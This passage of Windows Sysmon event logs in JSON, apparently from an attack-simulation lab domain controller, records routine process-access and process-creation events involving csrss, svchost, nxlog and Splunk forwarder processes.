C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.996","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-0010CD750B00}","TargetProcessId":"744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7467,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.996\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-0010CD750B00}\r\nTargetProcessId: 744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.996","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-0010CD750B00}","TargetProcessId":"744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7468,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:56.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:56.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7469,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:56.653\r\nProcessGuid: {E2A3D6B1-1328-5F25-0000-0010B5790B00}\r\nProcessId: 4540\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:00:56.653","ProcessGuid":"{E2A3D6B1-1328-5F25-0000-0010B5790B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7470,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:56.652\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1328-5F25-0000-0010B5790B00}\r\nTargetProcessId: 4540\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:56.652","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1328-5F25-0000-0010B5790B00}","TargetProcessId":"4540","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7471,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:56.652\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1328-5F25-0000-0010B5790B00}\r\nTargetProcessId: 4540\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:56.652","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1328-5F25-0000-0010B5790B00}","TargetProcessId":"4540","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7472,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:56.652\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:56.652","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7473,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:56.652\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:56.652","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7474,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:56.652\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 